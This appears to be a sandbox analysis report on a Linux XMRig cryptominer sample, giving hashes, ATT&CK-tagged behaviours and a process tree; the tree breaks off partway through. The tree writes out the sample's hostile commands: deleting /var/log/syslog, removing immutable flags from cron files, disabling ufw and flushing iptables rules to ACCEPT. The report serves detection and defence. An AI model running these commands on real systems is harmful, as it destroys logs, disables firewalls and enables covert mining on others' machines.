xmrig_linux | 7f82d34906c480afefcd26f969b815794f352a95ce280b4ddb0687ff096c6a8b

Analysis

max time kernel
5s
max time network
148s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
20-09-2024 03:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118
Size

30KB
MD5

eccba1bd0adedf00340c53fd34e800d7
SHA1

7b959de9d793bbc071dad336fd2e4d4cb82c7b0f
SHA256

7f82d34906c480afefcd26f969b815794f352a95ce280b4ddb0687ff096c6a8b
SHA512

116ca660e158a83ae12222aae2b440586604e51e58630a4f12118e1fae760a403d9bf00d7f79e4aad252d268736d699739d4665ee27b4f952a2660fd9c42f508
SSDEEP

384:p7pQBDf6jlpTWg3vMGQiirhHwMyGj4CC9vEKMvU/4Qdre21jT58vKpG2Y0orcfKU:p78zQ5VFNcDAFLcIwgnoYq0xFBVdHtrn

Score

10^/10

xmrig_linux defense_evasion discovery evasion execution miner persistence privilege_escalatio privilege_escalation rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

File and Directory Permissions Modification 1 TTPs 6 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
3105	Process not Found
3107	Process not Found
3112	Process not Found
3114	Process not Found
3119	Process not Found
3120	Process not Found

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 1 TTPs 3 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
3057	Process not Found
1511	ufw
1683	iptables

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

ioc	pid	Process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1515	modprobe

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
1684	sudo

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1509	chattr
1872	xargs
1978	xargs
2201	xargs
1993	xargs
1612	ip6tables
1677	ip6tables
2013	xargs
2947	Process not Found
1877	xargs
2063	xargs
2438	xargs
2703	Process not Found
1596	iptables
2088	xargs
2549	Process not Found
2605	Process not Found
2671	Process not Found
1811	xargs
2093	xargs
2132	xargs
2161	xargs
2149	xargs
2176	xargs
2307	xargs
2544	xargs
3011	Process not Found
2677	Process not Found
2979	Process not Found
2043	xargs
2206	xargs
2520	xargs
2589	Process not Found
2625	Process not Found
1657	ip6tables
2647	Process not Found
2693	Process not Found
1973	xargs
2349	xargs
2444	xargs
2987	Process not Found
3007	Process not Found
1704	grep
2408	xargs
2613	Process not Found
3094	Process not Found
1674	ip6tables
1765	xargs
1795	xargs
2327	xargs
2635	Process not Found
2941	Process not Found
1544	iptables
1645	ip6tables
2058	xargs
2343	xargs
2540	xargs
2465	xargs
2959	Process not Found
1560	iptables
1576	iptables
1907	xargs
1928	xargs
2282	xargs

Creates/modifies Cron job 1 TTPs 41 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.fR58NZ	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.pRt2b2	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.gcV4SL	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.hCe5FO	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.jMkm6U	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.SIlPxT	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.lsiSBX	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.B6ti1W	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.zdWs10	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.fZt89L	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.krJuGS	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.KoNbIW	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.Kq67ZZ	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.IotM4Y	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.MxsABL	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.mUFKCO	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.rzXBoZ	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.aapdH0	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.IDcx34	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.TaO2hQ	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.4II4uU	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.ugQsVT	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.7fjin4	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.Qh5Li1	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.6yQXFM	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.25Cq9Q	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.f1VmET	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.a8WLIZ	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.ThbJrY	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.qop1f2	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.OACcnP	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.85KOMV	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.QEopE1	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.Pqm9z1	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.neuvx2	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.2r9cXO	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.bHB14N	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.HFhsmS	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.nD5O5R	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.jdvdkT	Process not Found
File opened for modification	/var/spool/cron/crontabs/tmp.vkIWLY	Process not Found

Disables AppArmor 28 IoCs

Disables AppArmor security module.

pid	Process
3046	Process not Found
3053	Process not Found
3058	Process not Found
3058	Process not Found
3058	Process not Found
3033	Process not Found
3059	Process not Found
3033	Process not Found
3059	Process not Found
3059	Process not Found
3059	Process not Found
3059	Process not Found
3033	Process not Found
3033	Process not Found
3053	Process not Found
3053	Process not Found
3058	Process not Found
3058	Process not Found
3068	Process not Found
3033	Process not Found
3033	Process not Found
3053	Process not Found
3070	Process not Found
3059	Process not Found
3053	Process not Found
3053	Process not Found
3058	Process not Found
3081	Process not Found

Disables SELinux 1 TTPs 1 IoCs

Disables SELinux security module.

defense_evasion

Disable or Modify Tools

T1562.001

pid	Process
3032	Process not Found

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	3050

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
1823	ps
1969	ps
1994	ps
2212	ps
2237	ps
2123	ps
2255	ps
2323	ps
2162	ps
1944	ps
1954	ps
2108	ps
2227	ps
2298	ps
2044	ps
2350	ps
2039	ps
2155	ps
1979	ps
2074	ps
2308	ps
2313	ps
2368	ps
1959	ps
2182	ps
2265	ps
2293	ps
2344	ps
1701	ps
1873	ps
1934	ps
2049	ps
2079	ps
2249	ps
2421	ps
1893	ps
2466	ps
2403	ps
1703	ps
1828	ps
1868	ps
2187	ps
2283	ps
2303	ps
2338	ps
2439	ps
2328	ps
1913	ps
1989	ps
2004	ps
2128	ps
2362	ps
2019	ps
2177	ps
2192	ps
2202	ps
1949	ps
2024	ps
2084	ps
2094	ps
2288	ps
2427	ps
1888	ps
1924	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1111/status	Process not Found
File opened for reading	/proc/553/status	ps
File opened for reading	/proc/1137/status	Process not Found
File opened for reading	/proc/1146/status	ps
File opened for reading	/proc/668/status	ps
File opened for reading	/proc/969/stat	ps
File opened for reading	/proc/137/status	Process not Found
File opened for reading	/proc/4/cmdline	Process not Found
File opened for reading	/proc/561/status	Process not Found
File opened for reading	/proc/668/cmdline	ps
File opened for reading	/proc/1277/status	ps
File opened for reading	/proc/470/cmdline	ps
File opened for reading	/proc/965/status	Process not Found
File opened for reading	/proc/556/cmdline	Process not Found
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/1193/status	ps
File opened for reading	/proc/411/stat	ps
File opened for reading	/proc/167/cmdline	ps
File opened for reading	/proc/1291/status	Process not Found
File opened for reading	/proc/677/cmdline	Process not Found
File opened for reading	/proc/filesystems	Process not Found
File opened for reading	/proc/967/stat	ps
File opened for reading	/proc/1310/cmdline	ps
File opened for reading	/proc/137/cmdline	ps
File opened for reading	/proc/78/status	Process not Found
File opened for reading	/proc/1064/cmdline	Process not Found
File opened for reading	/proc/165/cmdline	Process not Found
File opened for reading	/proc/1174/stat	ps
File opened for reading	/proc/609/stat	ps
File opened for reading	/proc/83/stat	ps
File opened for reading	/proc/89/status	ps
File opened for reading	/proc/137/status	ps
File opened for reading	/proc/23/status	Process not Found
File opened for reading	/proc/173/cmdline	Process not Found
File opened for reading	/proc/1504/cmdline	ps
File opened for reading	/proc/475/cmdline	ps
File opened for reading	/proc/1356/stat	ps
File opened for reading	/proc/19/cmdline	ps
File opened for reading	/proc/1133/stat	ps
File opened for reading	/proc/652/status	Process not Found
File opened for reading	/proc/1172/status	Process not Found
File opened for reading	/proc/20/cmdline	Process not Found
File opened for reading	/proc/162/cmdline	Process not Found
File opened for reading	/proc/17/cmdline	Process not Found
File opened for reading	/proc/1191/cmdline	ps
File opened for reading	/proc/163/status	ps
File opened for reading	/proc/204/status	Process not Found
File opened for reading	/proc/649/stat	ps
File opened for reading	/proc/1064/cmdline	Process not Found
File opened for reading	/proc/18/stat	ps
File opened for reading	/proc/1071/cmdline	Process not Found
File opened for reading	/proc/492/status	Process not Found
File opened for reading	/proc/1154/status	Process not Found
File opened for reading	/proc/203/stat	Process not Found
File opened for reading	/proc/26/cmdline	pkill
File opened for reading	/proc/25/stat	ps
File opened for reading	/proc/1502/status	ps
File opened for reading	/proc/10/status	Process not Found
File opened for reading	/proc/269/cmdline	Process not Found
File opened for reading	/proc/26/stat	ps
File opened for reading	/proc/35/status	ps
File opened for reading	/proc/30/cmdline	Process not Found
File opened for reading	/proc/175/status	Process not Found

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1515	modprobe
2066	grep
2096	grep
2310	grep
2850	Process not Found
3207	Process not Found

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/log_rot	eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118

/tmp/eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118
/tmp/eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:1504
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:1505
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:1507
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:1508
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:1509
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  PID:1510
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1511
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:1512
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1513
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1514
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        System Network Configuration Discovery
        
        PID:1515
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1519
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1522
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1523
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1524
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1525
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1526
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:1527
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1528
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1529
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:1530
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1531
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:1532
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:1533
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1534
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1535
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1536
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1537
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1538
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1539
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1540
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1541
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1542
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1543
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      Attempts to change immutable files
      PID:1544
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1545
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1546
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1547
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1548
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1549
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1550
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1551
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1552
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1553
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1554
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1555
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1556
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1557
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1558
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1559
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      Attempts to change immutable files
      PID:1560
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1561
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:1562
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1563
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1564
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1565
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1566
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1567
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1568
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1569
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1570
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1571
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1572
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1573
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1574
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1575
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      Attempts to change immutable files
      PID:1576
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1577
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1578
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1579
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1580
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1581
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1582
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1583
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1584
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1585
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1586
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1587
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1588
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1589
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1590
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1591
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1592
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1593
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1594
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1595
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1596
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1597
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1598
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1599
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1600
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1601
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1602
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1603
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1604
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1605
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1606
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1607
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:1608
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1609
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:1610
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1611
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      Attempts to change immutable files
      PID:1612
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1613
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1614
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1615
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1616
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1617
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1618
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1619
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1620
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1621
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1622
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1623
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1624
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:1625
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1626
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1627
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1628
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1629
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1630
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1631
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1632
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1633
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1634
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1635
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1636
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1637
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1638
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1639
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1640
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:1641
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:1642
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:1643
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1644
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      Attempts to change immutable files
      PID:1645
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1646
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1647
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1648
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1649
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1650
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1651
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1652
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1653
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1654
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1655
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1656
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      Attempts to change immutable files
      PID:1657
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1658
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1659
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1660
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1661
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1662
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1663
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1664
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1665
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1666
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1667
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1668
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1669
  - - /sbin/ip6tables
